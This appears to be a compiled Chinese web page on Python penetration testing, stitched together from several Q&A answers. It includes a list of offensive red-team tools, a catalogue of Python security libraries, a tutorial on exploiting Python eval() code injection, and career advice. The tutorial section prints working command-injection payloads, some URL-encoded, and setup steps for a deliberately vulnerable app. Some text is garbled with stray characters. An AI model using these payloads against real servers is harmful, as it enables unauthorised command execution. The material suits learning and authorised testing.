python滲透技術

Ⅰ 紅隊最喜歡的18 種優秀的網路安全滲透工具

Bishop labs用了兩期博客，前後各總結了9個紅隊工具，共計18個紅隊使用的優秀滲透工具，其博客文章也提及，這份清單不是決定性的，也僅用於參考。

創建者： @IAmMandatory

用途：允許 谷歌 Chrome 瀏覽器將受害者的瀏覽器變成測試代理。

優點： CursedChrome 可以很容易地在紅隊參與期間模擬惡意瀏覽器擴展。用來劫持 Chrome 瀏覽器，繞過大多數 2FA 或其他可能存在的安全保護，並利用 cookie 來訪問任何基於網路的目標。

創建者： @symbolcrash1

用途： Universal Loader 是一個 Golang 庫，可以跨多個平台（linux、Windows 和 OSX）從內存中載入共享庫，而無需CGO。

優點： Universal Loader 可以用在新的 Apple M1 晶元上，值得一提的是，這個 Golang 庫沒有使用 memfd，這使它成為第一個這樣做的 Golang Linux 載入器。由於這兩個原因，Universal Loader 是一個相當令人印象深刻的紅隊工具。

創建者： QSecure Labs

用途： Overlord 是一個基於 python 的控制台命令行界面，用於自動化紅隊基礎設施。

優點： 在紅隊參與期間能夠根據需要快速啟動安全基礎設施非常重要，該工具可以節省大量時間，然後可以將這些時間用於進行一些實際的黑客攻擊。

創作者： @LittleJoeTables和@rkervell

用途： Sliver是一個用 Golang 編寫的跨平台通用植入框架。

優點： 這個工具是握皮兩位 Bishop Fox 研究人員的創意，所以我們的偏見可能會表現出來。類似於商業工具Cobalt Strike。使 Sliver 值得注意的是諸如使用每個二進制混淆的動態代碼生成、多個和可擴展的出口協議以及支持多個操作員同時控制植入物等功能。此外，它易於使用且運行速度快。

創作者： @tillson_

用途： 使用 Githound 來定位暴露的 API 密鑰和其他圍繞 GitHub 浮動的敏感信息。該工具通過模式匹配、提交 歷史 搜索和「獨特的結果評分系統」工作。

優點： 像 Githound 這樣的秘密竊取工具並不少見，但這並沒有使這個工具（或其他類似工具）的價值降低。Githound 的一些可能用例包括檢測暴露的客戶 API 密鑰以及員工 API 令牌。如果您進行漏洞賞金，此工具可用於添加書簽 - 有些人報告說，由於它，因此獲得了數千美元的賞金。

創作者： @browninfosecguy

用途： 這個工具的名字說明了一切，在 PowerShell 中輕松地為 Microsoft Active Directory 設置實驗室。

優點： 速度很快，效果很好。可以使用此工具來確保您針對 Active Directory 使用的任何漏洞利用都已完善，然後再將其引入客戶端環境。對於只想更輕松地測試 Active Directory 的滲透測試員來說非常有用。

創建者： Microsoft Azure 紅隊

用途： 可以使用 Stormspotter 更好地可視化 Azure 攻擊面；此工具可幫助您繪制 Azure 和 Azure Active Directory 對象。

優點： 類似滲透測試工具BloodHound概念類似，只是該工具是為 Azure 環境設計的。對於任何藍色或紫色團隊成員來說，從防禦或皮扮的角度來看，Stormspotter 也非常有用。

創建者： @Void_Sec

用途： ECG 實際上是一種商業工具。衫灶該工具是靜態源代碼掃描器，能夠分析和檢測 TCL/ADP 源代碼中真實和復雜的安全漏洞。

優點： ECG是一種強大的工具，可以填補令人驚訝的空白。正如 VoidSec 在他們的官方文章中所指出的，TCL代碼相當普遍；所以能夠徹底分析漏洞可能會非常有幫助。沒有很多其他工具可以滿足這種獨特的需求，無論是商業的還是其他的。

創建者： @TryCatchHCF

用途： 可以使用 DumpsterFire 構建「時間觸發的分布式」安全事件來測試紅隊進攻和藍隊防守。

優點： DumpsterFire 將傳統桌面練習提升到一個新的水平，它還使用自動化來在參與期間有效地進行多任務處理（並避開一些更乏味的事情）。DumpsterFire 允許的定製程度令人印象深刻；可以真正定製模擬安全事件來滿足獨一無二的情況。

10.GhostPack

創建者： SpecterOps ( @SpecterOps )

用途： 藉助強大的後開發工具集 GhostPack，可以做各種事情；可以攻擊 KeePass 2.X 資料庫、復制鎖定的文件、篡改 Active Directory 證書等。

優點： GhostPack 是一種滿足黑客需求的「一站式商店」。包含的 13 個工具包括非常有用的 Rubeus、Seatbelt 和 SharpUp。Rubeus 是一個 C# 工具集，直接與 Active Directory 環境中的 Kerberos 協議交互，允許直接與 Kerberos 屬性（例如票證和常規身份驗證）進行通信，然後可以利用這些屬性在網路中移動。Seatbelt 是一個 C# 項目，可用於面向安全的主機「安全檢查」，而 SharpUp 是一個 C# 工具，可識別本地許可權提升路徑。這些工具被無數紅隊和網路滲透測試員使用。

創作者： Benjamin Delpy ( @gentilkiwi )

用途： Mimikatz 可以從 Windows 環境中提取密碼和其他憑據。是一種非常流行的滲透測試工具，已經存在了十多年。但 Mimikatz 會定期維護和更新，以確保仍然是最前沿的工具

優點： 將 Mimikatz 視為網路滲透測試的瑞士軍刀。帶有幾個內置工具，對 Kerberoasting、密碼轉儲很有用，你能想到的，Mimikatz 都可以做到。而且 Mimikatz 不僅適用於那裡的進攻性安全專業人員——防禦性安全團隊也可以從中受益（如果你發現自己處於紫色團隊場景中，這也是個好兆頭）。

創建者： Metasploit 項目 ( @metasploit )，由 Rapid7 與開源社區合作運營

用途： Metasploit 可以說是世界領先的滲透測試框架，由 HD Moore 於 2003 年創建。Metasploit 包括用於滲透測試幾乎每個階段的模塊，這有助於其普及。包括約 250 個後利用模塊，可用於捕獲擊鍵、收集網路信息、顯示操作系統環境變數等。

優點： Metasploit 後開發模塊非常龐大，有一個模塊最突出——Meterpreter 有效載荷。Meterpreter 允許 探索 目標系統並執行代碼，並且由於它通過內存 DLL 注入工作，因此不必冒險留下任何操作證據。Metasploit 後開發功能也非常通用，具有適用於 Windows、Linux 和 OS X 的模塊。

創作者： 阿德里安·沃爾默( @mr_mitm )

用途： 此後利用工具旨在繞過端點檢測和應用程序阻止列表。

優點： 可以使用 PowerHub 傳輸文件，而不會在測試環境中發出任何安全保護警報，這將使下一次滲透測試更加順暢和輕松。使用此工具領先於 Windows Defender。

創建者： LOLBAS 項目和亞利桑那州安全工程與研究小組

用途： LOLBAS 是一個字典，用於在 Windows 機器上使用二進制文件查找可能的許可權提升路徑。LLOLBAS 是與 LOLBAS 協同工作的攝取器。攝取器會在 Windows 機器上的 LOLBAS 列表中查找所有二進制文件，因此無需猜測或對列表進行排序以查找它們（這可能很乏味）。

優點： LOLBAS 項目可搜索機器上可能的許可權提升路徑，而 LLOLBAS 允許針對特定機器定製這些路徑。結合這兩個工具，（幾乎）在參與中勢不可擋。作為一個額外的好處，如果出現需要它們的情況，可以方便地使用離線工具。

創作者： @nil0x42

用途： phpSploit 充當功能齊全的 C2 框架，通過單行 PHP 後門在 Web 伺服器上靜默地持久化。

優點： PHPSploit 是非安全參與時手頭上的一項了不起的工具——高效、用戶友好且運行安靜。正如其 GitHub 描述所述，PHPSploit 是「由偏執狂，為偏執狂設計的」。

創作者： 塞瓦加斯

用途： 可以使用 swap_digger 在後期開發或取證期間自動進行 Linux 交換分析。

優點： 在 Linux 交換空間中可以找到各種各樣的好東西，從密碼和電子郵件地址到 GPG 私鑰。Swap_digger 可以梳理這些交換空間並找到高影響力的獎杯，這將使評估更加成功。

創建者： RedCode 實驗室

用途： Bashark 是一個後開發工具包，顧名思義，是用編程語言 Bash 編寫的。這是一個可以產生巨大結果的簡單腳本。

優點： Bashark 工作快速而隱蔽，允許通過創建 Bash 函數來添加新命令，並清除在目標環境中使用腳本後可能留下的任何痕跡。

創作者： AlessandroZ

用途： 使用 BeRoot 項目查找可用於在 Windows、Linux 和 OS X 環境中提升許可權的常見錯誤配置。

優點： 識別常見的錯誤配置是在網路中立足的最可靠方法之一，因此找到這些錯誤配置的速度越快越好。BeRoot 項目在這方面提供了極大的幫助。

本文，旨在介紹一些紅隊工具，供大家了解和參考研究之用，不建議任何人利用網路技術從事非法工作，破壞他人計算機等行為。滲透有風險，入坑需謹慎。法網恢恢，疏而不漏。請正確理解滲透含義，正確利用滲透技術，做網路安全服務的踐行者。

Ⅱ 用python搞滲透可以不

可以的
python是一種很方便的腳本語言
寫成腳本去進行滲透

Ⅲ Python滲透測試工具都有哪些

網路

Scapy, Scapy3k: 發送，嗅探，分析和偽造網路數據包。可用作互動式包處理程序或單獨作為一個庫

pypcap, Pcapy, pylibpcap: 幾個不同 libpcap 捆綁的python庫

libdnet: 低級網路路由，包括埠查看和乙太網幀的轉發

dpkt: 快速，輕量數據包創建和分析，面向基本的 TCP/IP 協議

Impacket: 偽造和解碼網路數據包，支持高級協議如 NMB 和 SMB

pynids: libnids 封裝提供網路嗅探，IP 包碎片重組，TCP 流重組和埠掃描偵查

Dirtbags py-pcap: 無需 libpcap 庫支持讀取 pcap 文件

flowgrep: 通過正則表達式查找數據包中的 Payloads

Knock Subdomain Scan: 通過字典枚舉目標子域名

SubBrute: 快速的子域名枚舉工具

Mallory: 可擴展的 TCP/UDP 中間人代理工具，可以實時修改非標准協議

Pytbull: 靈活的 IDS/IPS 測試框架（附帶超過300個測試樣例）

調試和逆向工程

Paimei: 逆向工程框架，包含PyDBG, PIDA , pGRAPH

Immunity Debugger: 腳本 GUI 和命令行調試器

mona.py: Immunity Debugger 中的擴展，用於代替 pvefindaddr

IDAPython: IDA pro 中的插件，集成 Python 編程語言，允許腳本在 IDA Pro 中執行

PyEMU: 全腳本實現的英特爾32位模擬器，用於惡意軟體分析

pefile: 讀取並處理 PE 文件

pydasm: Python 封裝的libdasm

PyDbgEng: Python 封裝的微軟 Windows 調試引擎

uhooker: 截獲 DLL 或內存中任意地址可執行文件的 API 調用

diStorm: AMD64 下的反匯編庫

python-ptrace: Python 寫的使用 ptrace 的調試器

vdb/vtrace: vtrace 是用 Python 實現的跨平台調試 API, vdb 是使用它的調試器

Androguard: 安卓應用程序的逆向分析工具

Capstone: 一個輕量級的多平台多架構支持的反匯編框架。支持包括ARM,ARM64,MIPS和x86/x64平台

PyBFD: GNU 二進制文件描述(BFD)庫的 Python 介面

Fuzzing

Sulley: 一個模糊器開發和模糊測試的框架，由多個可擴展的構件組成的

Peach Fuzzing Platform: 可擴展的模糊測試框架(v2版本 是用 Python 語言編寫的)

antiparser: 模糊測試和故障注入的 API

TAOF: (The Art of Fuzzing, 模糊的藝術)包含 ProxyFuzz, 一個中間人網路模糊測試工具

untidy: 針對 XML 模糊測試工具

Powerfuzzer: 高度自動化和可完全定製的 Web 模糊測試工具

SMUDGE: 純 Python 實現的網路協議模糊測試

Mistress: 基於預設模式，偵測實時文件格式和偵測畸形數據中的協議

Fuzzbox: 媒體多編碼器的模糊測試

Forensic Fuzzing Tools: 通過生成模糊測試用的文件，文件系統和包含模糊測試文件的文件系統，來測試取證工具的魯棒性

Windows IPC Fuzzing Tools: 使用 Windows 進程間通信機制進行模糊測試的工具

WSBang: 基於 Web 服務自動化測試 SOAP 安全性

Construct: 用於解析和構建數據格式(二進制或文本)的庫

fuzzer.py(feliam): 由 Felipe Andres Manzano 編寫的簡單模糊測試工具

Fusil: 用於編寫模糊測試程序的 Python 庫

Web

Requests: 優雅，簡單，人性化的 HTTP 庫

HTTPie: 人性化的類似 cURL 命令行的 HTTP 客戶端

ProxMon: 處理代理日誌和報告發現的問題

WSMap: 尋找 Web 伺服器和發現文件

Twill: 從命令行界面瀏覽網頁。支持自動化網路測試

Ghost.py: Python 寫的 WebKit Web 客戶端

Windmill: Web 測試工具幫助你輕松實現自動化調試 Web 應用

FunkLoad: Web 功能和負載測試

spynner: Python 寫的 Web瀏覽模塊支持 javascript/AJAX

python-spidermonkey: 是 Mozilla JS 引擎在 Python 上的移植，允許調用 Javascript 腳本和函數

mitmproxy: 支持 SSL 的 HTTP 代理。可以在控制台介面實時檢查和編輯網路流量

pathod/pathoc: 變態的 HTTP/S 守護進程，用於測試和折磨 HTTP 客戶端

Ⅳ 如何使用python查找網站漏洞

如果你的Web應用中存在Python代碼注入漏洞的話，攻擊者就可以利用你的Web應用來向你後台伺服器的Python解析器發送惡意Python代碼了。這也就意味著，如果你可以在目標伺服器中執行Python代碼的話，你就可以通過調用伺服器的操作系統的指令來實施攻擊了。通過運行操作系統命令，你不僅可以對那些可以訪問到的文件進行讀寫操作，甚至還可以啟動一個遠程的互動式Shell(例如nc、Metasploit和Empire)。
為了復現這個漏洞，我在最近的一次外部滲透測試過程中曾嘗試去利用過這個漏洞。當時我想在網上查找一些關於這個漏洞具體應用方法的信息，但是並沒有找到太多有價值的內容。在同事Charlie Worrell(@decidedlygray)的幫助下，我們成功地通過Burp POC實現了一個非互動式的shell，這也是我們這篇文章所要描述的內容。
因為除了Python之外，還有很多其他的語言(例如Perl和Ruby)也有可能出現代碼注入問題，因此Python代碼注入屬於伺服器端代碼注入的一種。實際上，如果各位同學和我一樣是一名CWE的關注者，那麼下面這兩個CWE也許可以給你提供一些有價值的參考內容：
1. CWE-94：代碼生成控制不當(『代碼注入』)2. CWE-95：動態代碼評估指令處理不當(『Eval注入』)漏洞利用
假設你現在使用Burp或者其他工具發現了一個Python注入漏洞，而此時的漏洞利用Payload又如下所示：
eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))那麼你就可以使用下面這個Payload來在目標主機中實現操作系統指令注入了：
eval(compile("""for x in range(1):\\n import os\\n os.popen(r'COMMAND').read()""",'','single'))實際上，你甚至都不需要使用for循環，直接使用全局函數「__import__」就可以了。具體代碼如下所示：
eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))其實我們的Payload代碼還可以更加簡潔，既然我們已經將import和popen寫在了一個表達式裡面了，那麼在大多數情況下，你甚至都不需要使用compile了。具體代碼如下所示：
__import__('os').popen('COMMAND').read()
為了將這個Payload發送給目標Web應用，你需要對其中的某些字元進行URL編碼。為了節省大家的時間，我們在這里已經將上面所列出的Payload代碼編碼完成了，具體如下所示：
param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29接下來，我們將會給大家介紹關於這個漏洞的細節內容，並跟大家分享一個包含這個漏洞的Web應用。在文章的結尾，我將會給大家演示一款工具，這款工具是我和我的同事Charlie共同編寫的，它可以明顯降低你在利用這個漏洞時所花的時間。簡而言之，這款工具就像sqlmap一樣，可以讓你快速找到SQL注入漏洞，不過這款工具仍在起步階段，感興趣的同學可以在項目的GitHub主頁[傳送門]中與我交流一下。
搭建一個包含漏洞的伺服器
為了更好地給各位同學進行演示，我專門創建了一個包含漏洞的Web應用。如果你想要自己動手嘗試利用這個漏洞的話，你可以點擊這里獲取這份Web應用。接下來，我們要配置的就是Web應用的運行環境，即通過pip或者easy_install來安裝web.py。它可以作為一台獨立的伺服器運行，或者你也可以將它載入至包含mod_wsgi模塊的Apache伺服器中。相關操作指令如下所示：
git clone https://github.com/sethsec/PyCodeInjection.gitcd VulnApp
./install_requirements.sh
python PyCodeInjectionApp.py
漏洞分析
當你在網上搜索關於python的eval()函數時，幾乎沒有文章會提醒你這個函數是非常不安全的，而eval()函數就是導致這個Python代碼注入漏洞的罪魁禍首。如果你遇到了下面這兩種情況，說明你的Web應用中存在這個漏洞：
1. Web應用接受用戶輸入(例如GET/POST參數，cookie值);2. Web應用使用了一種不安全的方法來將用戶的輸入數據傳遞給eval()函數(沒有經過安全審查，或者缺少安全保護機制);下圖所示的是一份包含漏洞的示例代碼：
\
大家可以看到，eval()函數是上述代碼中唯一一個存在問題的地方。除此之外，如果開發人員直接對用戶的輸入數據(序列化數據)進行拆封的話，那麼Web應用中也將會出現這個漏洞。
不過需要注意的是，除了eval()函數之外，Python的exec()函數也有可能讓你的Web應用中出現這個漏洞。而且據我所示，現在很多開發人員都會在Web應用中不規范地使用exec()函數，所以這個問題肯定會存在。
自動掃描漏洞
為了告訴大家如何利用漏洞來實施攻擊，我通常會使用掃描器來發現一些我此前沒有見過的東西。找到之後，我再想辦法將毫無新意的PoC開發成一個有意義的exploit。不過我想提醒大家的是，不要過度依賴掃描工具，因為還很多東西是掃描工具也找不到的。
這個漏洞也不例外，如果你在某個Web應用中發現了這個漏洞，那麼你肯定使用了某款自動化的掃描工具，比如說Burp Suite Pro。目前為止，如果不使用類似Burp Suite Pro這樣的專業掃描工具，你幾乎是無法發現這個漏洞的。
當你搭建好測試環境之後，啟動並運行包含漏洞的示例應用。接下來，使用Burp Suite Pro來對其進行掃描。掃描結果如下圖所示：
\
下圖顯示的是Burp在掃描這個漏洞時所使用的Payload：
\
我們可以看到，Burp之所以要將這個Web應用標記為「Vulnerable」(包含漏洞的)，是因為當它將這個Payload發送給目標Web應用之後，伺服器的Python解析器休眠了20秒，響應信息在20秒之後才成功返回。但我要提醒大家的是，這種基於時間的漏洞檢查機制通常會存在一定的誤報。
將PoC升級成漏洞利用代碼
使用time.sleep()來驗證漏洞的存在的確是一種很好的方法。接下來，為了執行操作系統指令並接收相應的輸出數據，我們可以使用os.popen()、subprocess.Popen()、或者subprocess.check_output()這幾個函數。當然了，應該還有很多其他的函數同樣可以實現我們的目標。
因為eval()函數只能對表達式進行處理，因此Burp Suite Pro的Payload在這里使用了compile()函數，這是一種非常聰明的做法。當然了，我們也可以使用其他的方法來實現，例如使用全局函數「__import__」。關於這部分內容請查閱參考資料：[參考資料1][參考資料2]
下面這個Payload應該可以適用於絕大多數的場景：
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Example with one expression
__import__('os').popen('COMMAND').read()
# Example with multiple expressions, separated by commasstr("-"*50),__import__('os').popen('COMMAND').read()如果你需要執行一個或多個語句，那麼你就需要使用eval()或者compile()函數了。實現代碼如下所示：
# Examples with one expression
eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))eval(compile("""__import__('subprocess').check_output(r'COMMAND',shell=True)""",'','single'))#Examples with multiple statements, separated by semicolonseval(compile("""__import__('os').popen(r'COMMAND').read();import time;time.sleep(2)""",'','single'))eval(compile("""__import__('subprocess').check_output(r'COMMAND',shell=True);import time;time.sleep(2)""",'','single'))在我的測試過程中，有時全局函數「__import__」會不起作用。在這種情況下，我們就要使用for循環了。相關代碼如下所示：
eval(compile("""for x in range(1):\n import os\n os.popen(r'COMMAND').read()""",'','single'))eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'COMMAND',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'COMMAND',shell=True)""",'','single'))如果包含漏洞的參數是一個GET參數，那麼你就可以直接在瀏覽器中利用這個漏洞了：
\
請注意：雖然瀏覽器會幫你完成絕大部分的URL編碼工作，但是你仍然需要對分號(%3b)和空格(%20)進行手動編碼。除此之外，你也可以直接使用我們所開發的工具。
如果是POST參數的話，我建議各位直接使用類似Burp Repeater這樣的工具。如下圖所示，我在subprocess.check_output()函數中一次性調用了多個系統命令，即pwd、ls、-al、whoami和ping。
\
\
漏洞利用工具-PyCodeInjectionShell
你可以直接訪問PyCodeInjectionShell的GitHub主頁獲取工具源碼，我們也提供了相應的工具使用指南。在你使用這款工具的過程中會感覺到，它跟sqlmap一樣使用起來非常的簡單。除此之外，它的使用方法跟sqlmap基本相同。

Ⅳ 如何系統學習web安全，web滲透測試

首先得清楚web安全/web滲透是什麼：模擬黑客攻擊，利用黑客技術，挖掘漏洞，提出修復建議。

涉及到的技術有：資料庫/網路技術/編程技術/操作系統/滲透技術/攻防技術/逆向技術/SRC漏洞平台/ctf經驗。。

崗位能力要求：

1、熟練使用awvs、nessus、metasploit、burpsuite等安全測試工具，並對其原理有一定了解

2、熟悉OWASP中常見的web安全漏洞、業務邏輯漏洞及其原理

3、熟悉滲透測試技術的整體流程，具備獨立開展滲透工作的能力；

4、熟悉linux系統操作，了解常見web中間件、資料庫、伺服器相關漏洞

5、至少掌握一種編程語言，能夠開發用於輔助日常工作的腳本

6、具備一定的php或java代碼審計能力，能夠對公開漏洞進行分析

7、具備良好的邏輯思維、溝通技巧及團隊協作能力

8、已取得信息安全等級測評師證書的優先。（NISP）

想要系統的學習web滲透，可以參考企業對人才的要求進行學習。

Ⅵ 想學滲透技術，但是沒有相關基礎，問下從哪裡開始比較合適

你的情況和我以前很像（一年前吧），不過你考了np，我沒有，我多學了rhce。
我也是從13年開始接觸的，時間也不是很長，也沒有說成為了高手，只是我們情況很相近，所以談談我自己的學習方法，看看有沒有你可以借鑒的地方。
你已經在安全公司工作了，看了一下，你是做安全服務，而你想做滲透測試，那麼你可以這么做。
你可以下載一些滲透視頻來看，別覺得那很丟臉！然後，可以過一下owasp top10，還有一些滲透測試平台，下載下來，試著去做做。再配合一些書籍，道哥的和餘弦的。再接著，你可以去各大論壇看看文章，比如tools，90，fb，烏雲，360等等，在這些地方，會有很多知識讓你學。尤其是烏雲上的，案例非常多，而且大多數都是很短的時間就能學會的。再之後要拔高，肯定是需要一門語言為依託的，建議你從python入手，然後去推特上關注大牛，他們經常分享有用的新的知識點，英語不行就補。
對於學網路出身的，大部分要是做安全的話，都只做安全服務，確實很沉悶。
還有人說我們網路出身的很有優勢，我到目前為止都沒看出來優勢在哪裡。
共勉，同是網路人。。。。

Ⅶ 滲透測試工程師要掌握什麼技術

1、滲透技術包含：資料庫，asp.php.xss 等各種語言，Http等協議、代碼審計、web滲透，腳本滲透、ava,c++ 等。

2、滲透測試，是為了證明網路防禦按照預期計劃正常運行而提供的一種機制。不妨假設，你的公司定期更新安全策略和程序，時時給系統打補丁，並採用了漏洞掃描器等工具鍵清輪，以確保所有補丁都已打上。如果你早已做到了這些，為什麼還要請外方進行審查或滲透測試呢稿信？因為，滲透測試能夠獨立地檢查你的網路策略，換句話說，就是給你的系統安了一雙眼正帶睛。而且，進行這類測試的，都是尋找網路系統安全漏洞的專業人士。